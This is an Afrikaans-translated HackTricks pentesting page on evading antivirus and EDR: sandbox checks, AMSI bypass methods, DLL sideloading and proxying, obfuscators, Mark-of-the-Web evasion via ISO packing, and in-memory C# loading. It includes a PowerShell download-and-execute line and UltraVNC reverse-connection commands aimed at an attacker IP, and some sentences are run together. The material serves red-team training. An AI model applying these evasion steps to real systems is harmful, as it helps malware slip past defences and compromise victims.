<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
Tans gebruik AV's verskillende metodes om te kontroleer of 'n lêer skadelik is of nie, statiese opsporing, dinamiese analise, en vir die meer gevorderde EDR's, gedragsanalise.
Statiese opsporing word bereik deur bekende skadelike strings of reekse van bytes in 'n binêre of skripsie te merk, en ook inligting uit die lêer self te onttrek (bv. lêerbeskrywing, maatskappy naam, digitale handtekeninge, ikoon, kontrolesom, ens.). Dit beteken dat as jy bekende openbare gereedskap gebruik, kan jy makliker gevang word, aangesien hulle waarskynlik geanaliseer en as skadelik geïdentifiseer is. Daar is 'n paar maniere om hierdie soort opsporing te omseil:
As jy die binêre lêer versleutel, sal daar geen manier vir AV wees om jou program op te spoor nie, maar jy sal 'n soort laaier benodig om die program in geheue te ontsluit en uit te voer.
Soms hoef jy net 'n paar strings in jou binêre of skripsie te verander om dit verby AV te kry, maar dit kan 'n tydrowende taak wees, afhangende van wat jy probeer obfuskeer.
'N goeie manier om teen Windows Defender se statiese opsporing te toets is [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck). Dit verdeel basies die lêer in meervoudige segmente en vra dan Defender om elkeen individueel te skandeer, op hierdie manier kan dit jou presies vertel wat die gevlamde strings of bytes in jou binêre is.
Ek beveel sterk aan om hierdie [YouTube-afspeellys](https://www.youtube.com/playlist?list=PLj05gPj8rk\_pkb12mDe4PgYZ5qPxhGKGf) oor praktiese AV-ontwykings te kyk.
Dinamiese analise is wanneer die AV jou binêre lêer in 'n sandboks laat loop en vir skadelike aktiwiteit kyk (bv. probeer om jou blaaier se wagwoorde te ontsluit en te lees, 'n minidump op LSASS uit te voer, ens.). Hierdie deel kan 'n bietjie moeiliker wees om mee te werk, maar hier is 'n paar dinge wat jy kan doen om sandbokse te ontwyk.
* **Slaap voor uitvoering** Afhangende van hoe dit geïmplementeer is, kan dit 'n goeie manier wees om AV se dinamiese analise te omseil. AV's het 'n baie kort tyd om lêers te skandeer om nie die gebruiker se werkstroom te onderbreek nie, dus kan lang slaaptye die analise van binêre lêers versteur. Die probleem is dat baie AV-sandbokse die slaap kan ignoreer, afhangende van hoe dit geïmplementeer is.
* **Kontroleer van die masjien se hulpbronne** Gewoonlik het Sandbokse baie min hulpbronne om mee te werk (bv. <2GBRAM),anderskanditdiegebruikersemasjienvertraag.Jykanookbaiekreatiefhierwees,byvoorbeelddeurdieCPUsetemperatuurofselfsdiewaaierspoedtekontroleer,nieallessalindiesandboksgeïmplementeerweesnie.
* **Masjien-spesifieke kontroles** As jy 'n gebruiker wil teiken wie se werkstasie aan die "contoso.local" domein gekoppel is, kan jy 'n kontrole op die rekenaar se domein doen om te sien of dit ooreenstem met die een wat jy gespesifiseer het, as dit nie doen nie, kan jy jou program laat afsluit.
Dit blyk dat Microsoft Defender se Sandboks-rekenaarnaam HAL9TH is, so, jy kan vir die rekenaarnaam in jou malware kyk voor detonasie, as die naam HAL9TH ooreenstem, beteken dit jy is binne die verdediger se sandboks, sodat jy jou program kan laat afsluit.
Byvoorbeeld, as jy LSASS wil dump, **het jy werklik nodig om mimikatz te gebruik**? Of kan jy 'n ander projek gebruik wat minder bekend is en ook LSASS dump.
Die regte antwoord is waarskynlik die laaste. Neem mimikatz as 'n voorbeeld, dit is waarskynlik een van, indien nie die mees gevlamde stuk malware deur AV's en EDR's, terwyl die projek self super cool is, is dit ook 'n nagmerrie om daarmee te werk om AV's te omseil, soek net na alternatiewe vir wat jy probeer bereik.
Wanneer jy jou vragte vir ontwyking wysig, maak seker om **outomatiese monsterindiening af te skakel** in verdediger, en asseblief, ernstig, **MOET NIE NA VIRUSTOTAL OPLAAD NIE** as jou doel is om ontwyking op die lang duur te bereik. As jy wil sien of jou vrag deur 'n spesifieke AV opgespoor word, installeer dit op 'n VM, probeer om die outomatiese monsterindiening af te skakel, en toets dit daar totdat jy tevrede is met die resultaat.
Wanneer moontlik, **prioritiseer altyd die gebruik van DLL's vir ontwyking**, in my ervaring, word DLL-lêers gewoonlik **veel minder opgespoor** en geanaliseer, so dit is 'n baie eenvoudige truuk om te gebruik om opsporing in sommige gevalle te vermy (as jou vrag 'n manier het om as 'n DLL te hardloop natuurlik).
Soos ons in hierdie beeld kan sien, het 'n DLL-vrag van Havoc 'n opsporingstempo van 4/26 in antiscan.me, terwyl die EXE-vrag 'n opsporingstempo van 7/26 het.
<figure><imgsrc="../.gitbook/assets/image (1130).png"alt=""><figcaption><p>antiscan.me vergelyking van 'n normale Havoc EXE-vrag teen 'n normale Havoc DLL</p></figcaption></figure>
**DLL Sideloading** maak gebruik van die DLL-soekvolgorde wat deur die lader gebruik word deur beide die slagoffer-toepassing en die skadelike vragte langs mekaar te posisioneer.
Jy kan programme wat vatbaar is vir DLL Sideloading nagaan met behulp van [Siofra](https://github.com/Cybereason/siofra) en die volgende Powershell-skrip:
Ek beveel sterk aan dat jy **DLL-hijackbare/sideloadbare programme self verken**, hierdie tegniek is redelik slu en as dit behoorlik gedoen word, maar as jy openlik bekende DLL-sideloadbare programme gebruik, kan jy maklik gevang word.
Net deur 'n skadelike DLL met die naam wat 'n program verwag om te laai, te plaas, sal jou lading nie laai nie, aangesien die program verwag dat daar spesifieke funksies binne daardie DLL is. Om hierdie probleem op te los, sal ons 'n ander tegniek genaamd **DLL-proksiëring/doorstuur** gebruik.
**DLL-proksiëring** stuur die oproepe wat 'n program vanaf die proksi (en skadelike) DLL maak na die oorspronklike DLL, wat dus die funksionaliteit van die program behou en die uitvoering van jou lading kan hanteer.
5. Create a new visual studio project (C++ DLL), paste the code generated by SharpDLLProxy (Under output_dllname/dllname_pragma.c) and compile. Now you should have a proxy dll which will load the shellcode you've specified and also forward any calls to the original DLL.
Beide ons shellcode (geënkripteer met [SGN](https://github.com/EgeBalci/sgn)) en die proxy DLL het 'n 0/26 Opvangs tempo in [antiscan.me](https://antiscan.me)! Ek sou dit 'n sukses noem.
Ek **beveel sterk aan** dat jy [S3cur3Th1sSh1t se twitch VOD](https://www.twitch.tv/videos/1644171543) oor DLL Sideloading kyk en ook [ippsec se video](https://www.youtube.com/watch?v=3eROsG\_WNpE) om meer te leer oor wat ons meer diepgaand bespreek het.
Ontduiking is net 'n kat- en muisspel, wat vandag werk, kan môre opgespoor word, so moenie net op een instrument staatmaak nie, probeer indien moontlik om verskeie ontduikingstegnieke aan mekaar te koppel.
AMSI is geskep om "[lêerlose malware](https://en.wikipedia.org/wiki/Fileless\_malware)" te voorkom. Aanvanklik kon AV's slegs **lêers op skyf** skandeer, dus as jy op een of ander manier ladinge **direk in die geheue kon uitvoer**, kon die AV niks doen om dit te voorkom nie, omdat dit nie genoeg sigbaarheid gehad het nie.
Dit stel antivirusoplossings in staat om skripsiegedrag te inspekteer deur skripinhoud bloot te stel in 'n vorm wat beide onversleuteld en nie verduister is nie.
As jy `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` hardloop, sal dit die volgende waarskuwing op Windows Defender produseer.
Aangesien AMSI hoofsaaklik met statiese opsporings werk, kan die wysiging van die skripte wat jy probeer laai 'n goeie manier wees om opsporing te ontduik.
Nietemin het AMSI die vermoë om skripte te ontsluier selfs as dit meervoudige lae het, so obfuskasie kan 'n slegte opsie wees, afhangende van hoe dit gedoen is. Dit maak dit nie so eenvoudig om te ontduik nie. Alhoewel, soms is dit alles wat jy hoef te doen om 'n paar veranderlike name te verander en jy sal goed wees, dus dit hang af van hoeveel iets geïdentifiseer is.
Aangesien AMSI geïmplementeer word deur 'n DLL in die powershell (ook cscript.exe, wscript.exe, ens.) proses te laai, is dit moontlik om dit maklik te manipuleer selfs as 'n onbevoorregte gebruiker. As gevolg van hierdie fout in die implementering van AMSI het navorsers verskeie maniere gevind om AMSI-skandering te ontduik.
Die forsering van die AMSI-inisialisering om te misluk (amsiInitFailed) sal tot gevolg hê dat geen skandering vir die huidige proses geïnisieer word nie. Aanvanklik is dit bekendgemaak deur [Matt Graeber](https://twitter.com/mattifestation) en Microsoft het 'n handtekening ontwikkel om wyer gebruik te voorkom.
Dit het net een lyn van powershell-kode geneem om AMSI onbruikbaar te maak vir die huidige powershell-proses. Hierdie lyn is natuurlik deur AMSI self geïdentifiseer, dus 'n bietjie aanpassing is nodig om hierdie tegniek te gebruik.
Hier is 'n aangepaste AMSI-omleiding wat ek geneem het van hierdie [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db).
Hierdie tegniek is aanvanklik ontdek deur [@RastaMouse](https://twitter.com/\_RastaMouse/) en behels die vind van die adres vir die "AmsiScanBuffer" funksie in amsi.dll (verantwoordelik vir die skandering van die gebruiker-gelewerde insette) en dit te oorskryf met instruksies om die kode vir E\_INVALIDARG terug te gee, op hierdie manier sal die resultaat van die werklike skandering 0 teruggee, wat geïnterpreteer word as 'n skoon resultaat.
Lees asseblief [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) vir 'n meer gedetailleerde verduideliking.
Daar is ook baie ander tegnieke wat gebruik word om AMSI met powershell te omseil, kyk na [**hierdie bladsy**](basic-powershell-for-pentesters/#amsi-bypass) en [hierdie bewaarplek](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) om meer daaroor te leer.
Daar is verskeie gereedskap wat gebruik kan word om **C#-tekskode te obfuskasie**, genereer **metaprogrammeringstempaltes** om bineêre lêers saam te stel of **obfuskasie saamgestelde bineêre lêers** soos:
* [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): Die doel van hierdie projek is om 'n oopbronvurk van die [LLVM](http://www.llvm.org/) samestellingsuite te voorsien wat in staat is om verhoogde sagteware-sekuriteit te bied deur [kode-obfuskasie](http://en.wikipedia.org/wiki/Obfuscation\_\(software\)) en knoei-vasheid.
* [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator demonstreer hoe om `C++11/14`-taal te gebruik om, tydens samestelling, obfuskeerde kode te genereer sonder om enige eksterne gereedskap te gebruik en sonder om die samesteller te wysig.
* [**obfy**](https://github.com/fritzone/obfy): Voeg 'n laag van obfuskeerde operasies gegenereer deur die C++-sjabloonmetaprogrammeringsraamwerk by wat die lewe van die persoon wat die aansoek wil kraak, 'n bietjie moeiliker sal maak.
* [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz is 'n x64 bineêre obfuskator wat in staat is om verskeie verskillende pe-lêers te obfuskeer, insluitend: .exe, .dll, .sys
* [**metame**](https://github.com/a0rtega/metame): Metame is 'n eenvoudige metamorfe-kode-enjin vir willekeurige uitvoerbare lêers.
* [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator is 'n fynkorrelige kode-obfuskasieraamwerk vir LLVM-ondersteunde tale wat ROP (retour-georiënteerde programmering) gebruik. ROPfuscator obfuskeer 'n program op die samestellingskodevlak deur gewone instruksies in ROP-reekse te omskep, wat ons natuurlike konsep van normale beheerstroom dwarsboom.
Microsoft Defender SmartScreen is 'n sekuriteitsmeganisme wat bedoel is om die eindgebruiker te beskerm teen die uitvoer van potensieel skadelike aansoeke.
SmartScreen werk hoofsaaklik met 'n reputasie-gebaseerde benadering, wat beteken dat ongewone afgelaaide aansoeke SmartScreen sal aktiveer en sodoende die eindgebruiker waarsku en verhoed om die lêer uit te voer (alhoewel die lêer steeds uitgevoer kan word deur Meer inligting -> Hoe dan ook uit te voer).
**MoTW** (Mark of The Web) is 'n [NTFS Alternatiewe Datastroom](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)) met die naam van Zone.Identifier wat outomaties geskep word tydens die aflaai van lêers van die internet, saam met die URL waarvan dit afgelaai is.
<figure><imgsrc="../.gitbook/assets/image (237).png"alt=""><figcaption><p>Kontroleer die Zone.Identifier ADS vir 'n lêer wat van die internet afgelaai is.</p></figcaption></figure>
'N Baie effektiewe manier om te voorkom dat jou vragte die Mark of The Web kry, is deur hulle binne 'n soort houer soos 'n ISO te verpak. Dit gebeur omdat Mark-of-the-Web (MOTW) **nie** op **nie-NTFS** volumes toegepas kan word nie.
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) is 'n gereedskap wat vragte in uitvoerhouers pakketteer om die Mark of the Web te ontduik.
Hier is 'n demonstrasie om SmartScreen te omseil deur ladinge binne ISO-lêers te verpak met behulp van [PackMyPayload](https://github.com/mgeeky/PackMyPayload/)
Die laai van C# binêre lêers in geheue is al 'n geruime tyd bekend en dit is steeds 'n baie goeie manier om jou post-exploitation-gereedskap uit te voer sonder om deur AV gevang te word.
Aangesien die lading direk in geheue gelaai sal word sonder om die skyf aan te raak, sal ons slegs oorweging hoef te maak oor die lap van AMSI vir die hele proses.
Die meeste C2-raamwerke (silwer, Covenant, metasploit, CobaltStrike, Havoc, ens.) bied reeds die vermoë om C# monteer direk in geheue uit te voer, maar daar is verskillende maniere om dit te doen:
Dit behels **die skep van 'n nuwe offerproses**, inspuit jou post-exploitation skadelike kode in daardie nuwe proses, voer jou skadelike kode uit en wanneer klaar, maak die nuwe proses dood. Hierdie metode het sowel sy voordele as sy nadele. Die voordeel van die vurk en voer metode is dat uitvoering plaasvind **buite** ons Beacon implantaatproses. Dit beteken dat as iets verkeerd gaan of gevang word in ons post-exploitation-aksie, is daar 'n **veel groter kans** dat ons **implantaat oorleef.** Die nadeel is dat jy 'n **groter kans** het om gevang te word deur **Gedragsopsporing.**
Dit gaan daaroor om die post-exploitation skadelike kode **in sy eie proses** in te spuit. Op hierdie manier kan jy vermy om 'n nuwe proses te skep en dit te laat skandeer deur AV, maar die nadeel is dat as iets verkeerd gaan met die uitvoering van jou lading, is daar 'n **veel groter kans** om **jou sein** te verloor aangesien dit kan afkraak.
As jy meer wil lees oor C# Monteer laai, kyk gerus na hierdie artikel [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) en hul InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
Jy kan ook C# Monteer **vanuit PowerShell** laai, kyk na [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) en [S3cur3th1sSh1t se video](https://www.youtube.com/watch?v=oe11Q-3Akuk).
Soos voorgestel in [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins), is dit moontlik om skadelike kode uit te voer met behulp van ander tale deur die gekompromitteerde masjien toegang te gee **tot die tolk-omgewing wat op die Aanvaller Beheerde SMB-aandeel geïnstalleer is**.
Deur toegang tot die Tolkbineêre lêers en die omgewing op die SMB-aandeel toe te laat, kan jy **willekeurige kode in hierdie tale binne die geheue** van die gekompromitteerde masjien uitvoer.
Die repo dui aan: Verdediger skandeer steeds die skripte, maar deur gebruik te maak van Go, Java, PHP ens. het ons **meer buigsaamheid om statiese handtekeninge te omseil**. Toetsing met lukrake onversleutelde omgekeerde dop skripte in hierdie tale het suksesvol bewys.
Ontduiking is 'n baie ingewikkelde onderwerp, soms moet jy rekening hou met baie verskillende bronne van telemetrie in net een stelsel, dus dit is baie moeilik om heeltemal onopgespoor te bly in volwasse omgewings.
Ek moedig jou sterk aan om na hierdie praatjie te kyk van [@ATTL4S](https://twitter.com/DaniLJ94), om 'n voet in die deur te kry vir meer Gevorderde Ontduikingstegnieke.
Jy kan [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck) gebruik wat dele van die binêre lêer sal **verwyder** totdat dit uitvind watter deel Defender as skadelik beskou en dit aan jou sal opsplits.\
'n Ander instrument wat dieselfde ding doen, is [**avred**](https://github.com/dobin/avred) met 'n oop web wat die diens aanbied in [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
Laai dit af van: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html) (jy wil die binêre aflaaie hê, nie die opstelling nie)
Die **aanvaller** moet **binne** sy **gasheer** die binêre `vncviewer.exe -listen 5900` uitvoer sodat dit **gereed** sal wees om 'n omgekeerde **VNC-verbinding** te vang. Dan, binne die **slagoffer**: Begin die winvnc daemon `winvnc.exe -run` en hardloop `winwnc.exe [-autoreconnect] -connect <aanvaller_ip>::5900`
* Moet nie `winvnc` begin as dit reeds loop nie, anders sal jy 'n [popup](https://i.imgur.com/1SROTTl.png) veroorsaak. Kontroleer of dit loop met `tasklist | findstr winvnc`
* Moet nie `winvnc` begin sonder `UltraVNC.ini` in dieselfde gids nie, anders sal dit [die opstelvenster](https://i.imgur.com/rfMQWcf.png) laat oopmaak
// From https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
